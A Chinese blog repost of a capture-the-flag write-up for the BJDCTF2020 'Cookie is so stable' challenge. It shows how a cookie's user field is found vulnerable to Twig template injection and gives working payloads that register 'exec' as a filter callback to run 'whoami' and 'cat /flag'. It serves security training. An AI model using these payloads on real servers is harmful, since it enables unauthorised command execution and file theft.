首页 > 其他 > 详细

[BJDCTF2020]Cookie is so stable 1

时间:2021-06-26 23:51:37      阅读:36      评论:0      收藏:0      [点我收藏+]

技术分享图片

 

 

 

进入页面看见 flag和hint

点击flag就看到了输入框,tell me 你是谁

点击hint 查看源码

技术分享图片

 

 

 根据提示,cookie处可能存在问题

在输入框随便输入个名字,然后抓包看看cookie

技术分享图片

 

 

 技术分享图片

 

 

 

技术分享图片

 

 

 看到cookie里user参数,可疑点SSTI注入,放包然后看浏览器页面;

技术分享图片

 

 

 

点击注销,然后直接输入 测试代码

{{7+8}}        不抓包直接提交

技术分享图片

 

 

 

哦了,构造payload吧

user={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}                就是在登录的情况下刷新页面抓包,再把user的内容改了

技术分享图片

 

 

 

拿flag

user={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

技术分享图片

 

[BJDCTF2020]Cookie is so stable 1

原文:https://www.cnblogs.com/hackhackgo/p/14939225.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!